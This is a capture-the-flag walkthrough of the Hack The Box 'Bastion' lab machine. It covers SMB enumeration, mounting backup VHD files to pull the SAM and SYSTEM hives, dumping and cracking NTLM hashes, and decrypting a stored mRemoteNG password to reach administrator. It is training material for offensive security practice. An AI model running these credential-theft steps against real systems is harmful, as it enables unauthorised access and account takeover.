Bastion HTB
IP
10.10.10.134
Nmap
sudo nmap -sV -sC -A nmap_results 10.10.10.134

Most likely a windows server 2016
NetBIOS name BASTION\x00
Full port scan to make sure we dont miss anything
nmap -T5 -p- 10.10.10.134

Ports:
22:SSH
135:RPC
445:SMB
5985:Windows Remote Management (winrm)
47001:Windows Remote Management listener
Let's start by enumerating SMB
SMB enumeration
Let's see if anonymous login is enabled
crackmapexec smb 10.10.10.134 -p anonymous -u anonymous --shares
We can use crackmapexec to check if anonymous login is enabled and list any shares
It is enabled and we have read access to the share Backups.

Let's access the share, for this we can smbclient but it's worth getting some extra practice using impacket.
impacket-smbclient anonymous:anonymous@10.10.10.134

let's download note.txt and view the contents
get note.txt
Contents of note.txt

This is interesting the other files within the share must be quite large, worth investigating, what we can do is mount the share and explore the contents.
First lets create a directory for the mount point
mkdir Backups
Now we can mount to the Backups share
sudo mount -t cifs -o username=anonymous //10.10.10.134/Backups Backups
Let's move into the Backups share and list its contents

looking through WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351
we see two virtual hard disk files.

as Virtual Hard Disk (VHD) files are typically used to backup data stored on a hard-disk partition. As such, the data stored on a .vhd file is very interesting since it may contain sensitive information.
We do have 2 problems though
We are working within a Linux environment, and we dont really want to set up a Windows VM just to read these files but it is an option, as these VHD files are not the easiest to read in a Linux environment.
The VHD files are stored in a remote share, if we wish to download the share it could take a large amount of time due to the size of the files.
But what we can do is use a tool called guestmount
, first, we need to install the following.
sudo apt-get install libguestfs-tools
Lets create another mount point in our /mnt
directory
sudo mkdir /mnt/vhd
Now we can use guestmount
to mount to our Backups directory and view the contents of the VHD Files.
sudo guestmount --add Backups/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd
when we navigate to /mnt/vhd
we can see we are in the C drive of the file system

What we can do is navigate over to the /Windows/system32/config
Directory and copy the SAM and SYSTEM files as these are registry hives
Why do we want the SAM and SYSTEM files, we want to dump hashes from the system.
the SAM file holds the Encrypted user database
the SYSTEM file holds the boot key for the Encrypted database
if we happened to be in a domain controller we'd also want the NTDS file, for more information highly recommend reading https://shahrukhiqbal24.medium.com/let-the-secrets-sync-in-the-dcsync-attack-7be80fdd9869
Dumping hashes
In our working directory we should have both the SAM and SYSTEM files, we can use Impacket to dump the users hashes
impacket-secretsdump -sam SAM -system SYSTEM local

We have the following hashes
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9::
When looking at the Administrators Hash we can see the hash is blank,
31d6
means nothing, same withaad3b
as a NTLM hashwe have the user L4mpje hash
26112010952d963c8dc4217daec986d9
What we can do is see if L4mpje has write access over the C$ share and if so we can use psexec and get admin. to check we can use smbmap
smbmap -u L4mpje -p aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9 -H 10.10.10.134
-p: is the users NTLM hash as we are passing it through
But does not seem to be the case

What we can do is crack the hash and see if we can SSH in.
First let's crack it, for this, we will use https://crackstation.net/

we have successfully cracked the hash
26112010952d963c8dc4217daec986d9: bureaulampje
Lets SSH into the machine
ssh L4mpje@10.10.10.134
Privilege escalation via L4mpje
First Let's check the system information
we get an access denied
our privileges give us nothing special

if we look at the administrators group we find something weird
net localgroup administrators

Administrator is the only member of the group, but as we can recall from earlier the administrators hash was null
Lets look deeper into this
net user administrator

we can see the administrator has recently logged in.
Lets see when we SAM and SYSTEM file were last updated.


we can see the administrator's last password change was well after this SAM and SYSTEM backup files were created.
so now we know there is indeed an administrator user on the system.
Let's navigate to the C:\
directory and work our way up from there.
When viewing the Program Files (x86)
directory we can see a unusual program running.

mRemoteNG: a tool to manage remote connections with other computer systems, makes sense being in a bastion host (jumpbox) let's see if it could help us escalate our privileges
from the following article https://ethicalhackingguru.com/how-to-exploit-remote-connection-managers/ it explains how we can grab a password from the
C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml
If we look within the config file we do find the encoded password hash

We can use the following script to decode the base64 sha1 salted hash
Running the command (I did change the name since I only copied and paste it to my system)
python3 dc_mremote.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAo
wVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2
Now we have the password! lets SSH into the machine
ssh administrator@10.10.10.134
woohoo we are now the administrator

Last updated